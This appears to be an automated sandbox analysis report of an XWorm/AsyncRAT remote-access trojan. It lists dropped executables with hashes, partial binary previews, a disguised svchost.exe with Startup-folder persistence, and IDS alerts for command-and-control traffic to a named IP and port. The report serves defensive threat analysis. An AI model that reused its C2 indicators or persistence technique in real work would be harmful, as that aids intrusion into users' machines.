                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_la5u3ye3.a3o.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkuvb154.ceh.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w04eqogy.rmz.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgmfe21j.kul.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbtej3qw.ykg.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Roaming\ALL slumzick.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\All function.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14620672
                                                                  Entropy (8bit):1.5206619847778025
                                                                  Encrypted:false
                                                                  SSDEEP:49152:AYtLbnFXIUBXA6emScu5nNX0kib2IXCsi:V3XfeZX0kq2mCl
                                                                  MD5:735BD603CC2800BDB3972CC2B561E86A
                                                                  SHA1:35178565EDC8FCF97812722D3129881F8DD3BC95
                                                                  SHA-256:378DCDF213CB54D381732A1EF5E9881CEC416246B0B83C847D5DEF4017DFFA39
                                                                  SHA-512:FF0E9D7433D8003676BEDB44432B7E8490B4EC75DFD5F44C4F3A6C0AB9DC083BD0380A4AECCBA73FB429455BD49FEB99D1D841D5D076C687A8694952A418C575
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........h..;..;..;..;..;.Nx;..;.N.:..;.N.:..;.N.:..;.N.:..;H..:..;...:..;M..:..;..:..;..:..;...;..;..;..;.N.:..;.Nz;..;.N.:..;Rich..;........PE..d......g.........."....&.............m.........@.............................p............`....................................................l....@.......`...............P.......I..p....................J..(...@H..@............................................text...@........................... ..`.rdata...........0..................@..@.data............h..................@....pdata.......`.......,..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\All function.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14709248
                                                                  Entropy (8bit):5.073506080361151
                                                                  Encrypted:false
                                                                  SSDEEP:49152:tMMQ22U0u5E2YvhkBjyYLKze/vsplbITimRulHFc8k2PE:tMnrhKKz6vsp/m2rPE
                                                                  MD5:A23632476984A0D607DBF76B1096432F
                                                                  SHA1:47C78AE1D0FF1E3EF1CCC6B229086C355EDFFFD0
                                                                  SHA-256:BA87298065DEC0671A3194454A08F0B3671A78087A4043548B7FCCA9E229D8A4
                                                                  SHA-512:A6482876A6B99048ACB64EA46B7CFD4ADCD55537E7EA25C7CFD353BC57C224336750F5024008832F2EDDF1D358DA19E7CFAC1ABAC23D21FCD8272313820FBF6C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.@g.................h.............. ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....f... ...h.................. ..`.rsrc................j..............@..@.reloc...............p..............@..B........................H.......Pc..(#......!....&..2=............................................(....*.r...p*. .O..*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r...p*. =...*.r>..p*. ....*.rz..p*. ..5.*.r...p*. S2C.*.r...p*. ....*..(&...*.r ..p*. ..!.*.r\..p*.r...p*.r...p*. .vc.*.r...p*. ;%A.*.rL..p*. ..W.*.r...p*. ..'.*.0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0...........(".

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 2 18:10:45 2025, mtime=Thu Jan 2 18:10:46 2025, atime=Thu Jan 2 18:10:45 2025, length=69632, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):763
                                                                  Entropy (8bit):5.1171238187673564
                                                                  Encrypted:false
                                                                  SSDEEP:12:8XoP24dYChVq5lZY//tZmeLcQSlaRjAHNHk3Lm6mV:86y46S24cpwlAybhm
                                                                  MD5:97F546863204A6F808C8ABD3F9AA05D1
                                                                  SHA1:0347622EB14C7215A665476A16B3ADDA99DC2F46
                                                                  SHA-256:CC898FD6F54E0AB12D43DC4926EE4EA843D4694BCAC9FDBB283F1D04CD00ED47
                                                                  SHA-512:910BCC4DA9857DBD5758814C53BC7816992E13635F103DBD4187C9EB6930F31C2FEE963D9DA9584D31853499F79856504C3BE94DC57F5EC8B3C94EC5715E1CB9
                                                                  Malicious:false
                                                                  Preview:L..................F.... .....|.J]...G!.J]....|.J]..........................v.:..DG..Yr?.D..U..k0.&...&.........5q..._Hj.J].....J]......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N"ZT............................c..A.p.p.D.a.t.a...B.V.1....."ZW...Roaming.@......EW)N"ZX...........................>...R.o.a.m.i.n.g.....b.2....."ZW. .svchost.exe.H......"ZW."ZW...........................z.F.s.v.c.h.o.s.t...e.x.e.......X...............-.......W.............<8.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......061544...........hT..CrF.f4... .<..V=....+...E...hT..CrF.f4... .<..V=....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                  C:\Users\user\AppData\Roaming\svchost.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.975187764500989
                                                                  Encrypted:false
                                                                  SSDEEP:1536:WT/juex6LhRZniVHnXSe8PmWbT04YzNgWIOp6yF1R9Oc7uu:WjjuIpVHnXSe2xbTWqOlz9Ocau
                                                                  MD5:6D378D7AF71086710318CDDA873D9348
                                                                  SHA1:3D55D27FB66361254D954060904E5EE0B6CD13C1
                                                                  SHA-256:531640277D1DC2206A49F3A69D412CFECECC97251247917403A69ABF982E492B
                                                                  SHA-512:696B94E8D8FBAB051C1DB635765DAE200CAAA631850950D4B39F0AB92B4968EEDB3B86888F2E9A54CBA6DB7667A5FF4087B25F97E6C999A1464E2AD7B87DE131
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>%... ...@....@.. ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H........b..........&.....................................................(....*.r...p*. .=l.*..(....*.r!..p*. ^...*.s.........s.........s.........s.........*.r...p*. S...*.r...p*. .s..*.rr..p*. ...*.r...p*. ..Q.*.r>..p*. ....*..((...*.rr..p*. x.`.*.r...p*. FwB.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rN..p*. .x!.*.r...p*. *p{.*.r...p*.r...p*. Q...*.r...p*.rL..p*. ....*.r...p*.r...p*.r..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.206202393458702
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:file.exe
                                                                  File size:14'791'680 bytes
                                                                  MD5:f33eeceda472b6cc6b7880dbba4f4d1f
                                                                  SHA1:f7aadb89b32d89f593b4c1064d29209496468460
                                                                  SHA256:beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a
                                                                  SHA512:d552017090cf1b77d8ad4f9fe91cc8ad8a7ca915d2ae446c31102990119b4923df0b666e7e39df8f55152c8308f926e8eb6dd4289e870f927e4076ec1bd46387
                                                                  SSDEEP:49152:UMyMimd0NL7CIHwpUd+PP5JHyernS0UMVmGfJK1jxHbDW:U4d0NPCcwplddqxHbD
                                                                  TLSH:BBE666CAC3217BE79A3D98E3878BD682C5CE81FF435BA54E843D5968974584C4B3E702
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>.... ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:90cececece8e8eb0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x121c83e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6741F29F [Sat Nov 23 15:19:59 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe1c7ec0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe1e0000x4e6.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe200000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xe1a8440xe1aa00153c559cd90b3bc04be3a124e64dccf7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xe1e0000x4e60x600539dd67540ec84803a4976408ed92844False0.3782552083333333data3.7648609320544746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xe200000xc0x2006b92694aaa20489f5314ed0f16761bcfFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0xe1e0a00x25cdata0.4586092715231788
                                                                  RT_MANIFEST0xe1e2fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-02T20:12:05.630002+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:05.659317+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.105456245.141.26.1347000TCP
                                                                  2025-01-02T20:12:12.238570+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:12.238570+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:17.745407+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:17.747411+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.105456245.141.26.1347000TCP
                                                                  2025-01-02T20:12:29.859822+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:29.966060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.105456245.141.26.1347000TCP
                                                                  2025-01-02T20:12:41.956314+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:41.959243+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.105456245.141.26.1347000TCP
                                                                  2025-01-02T20:12:42.265305+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:42.265305+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:51.510194+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1347000192.168.2.1054562TCP
                                                                  2025-01-02T20:12:51.511184+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.105456245.141.26.1347000TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 2, 2025 20:10:50.260621071 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:10:50.265445948 CET8049702208.95.112.1192.168.2.10
                                                                  Jan 2, 2025 20:10:50.265567064 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:10:50.265943050 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:10:50.270747900 CET8049702208.95.112.1192.168.2.10
                                                                  Jan 2, 2025 20:10:50.724276066 CET8049702208.95.112.1192.168.2.10
                                                                  Jan 2, 2025 20:10:50.769661903 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:11:27.580049992 CET5453353192.168.2.10162.159.36.2
                                                                  Jan 2, 2025 20:11:27.587382078 CET5354533162.159.36.2192.168.2.10
                                                                  Jan 2, 2025 20:11:27.587500095 CET5453353192.168.2.10162.159.36.2
                                                                  Jan 2, 2025 20:11:27.595057964 CET5354533162.159.36.2192.168.2.10
                                                                  Jan 2, 2025 20:11:28.036984921 CET5453353192.168.2.10162.159.36.2
                                                                  Jan 2, 2025 20:11:28.045126915 CET5354533162.159.36.2192.168.2.10
                                                                  Jan 2, 2025 20:11:28.045209885 CET5453353192.168.2.10162.159.36.2
                                                                  Jan 2, 2025 20:11:49.377527952 CET8049702208.95.112.1192.168.2.10
                                                                  Jan 2, 2025 20:11:49.377616882 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:11:53.094321012 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:11:53.099169016 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:11:53.099303961 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:11:53.165153027 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:11:53.170053959 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:05.273448944 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:05.278203964 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:05.630002022 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:05.659317017 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:05.664166927 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:12.238569975 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:12.285406113 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:17.379580975 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:17.384360075 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:17.745407104 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:17.747411013 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:17.752163887 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:29.489404917 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:29.494272947 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:29.859822035 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:29.910429955 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:29.966059923 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:29.970885038 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:30.739794016 CET4970280192.168.2.10208.95.112.1
                                                                  Jan 2, 2025 20:12:30.744574070 CET8049702208.95.112.1192.168.2.10
                                                                  Jan 2, 2025 20:12:41.598530054 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:41.603468895 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:41.956314087 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:41.959243059 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:41.967468977 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:42.265305042 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:42.316684961 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:50.895358086 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:50.900238991 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:51.510194063 CET70005456245.141.26.134192.168.2.10
                                                                  Jan 2, 2025 20:12:51.511183977 CET545627000192.168.2.1045.141.26.134
                                                                  Jan 2, 2025 20:12:51.517936945 CET70005456245.141.26.134192.168.2.10

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 2, 2025 20:10:50.086584091 CET5546053192.168.2.101.1.1.1
                                                                  Jan 2, 2025 20:10:50.253070116 CET53554601.1.1.1192.168.2.10
                                                                  Jan 2, 2025 20:11:27.579309940 CET5349989162.159.36.2192.168.2.10
                                                                  Jan 2, 2025 20:11:28.065664053 CET53566571.1.1.1192.168.2.10

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 2, 2025 20:10:50.086584091 CET192.168.2.101.1.1.10xffeStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 2, 2025 20:10:50.253070116 CET1.1.1.1192.168.2.100xffeNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

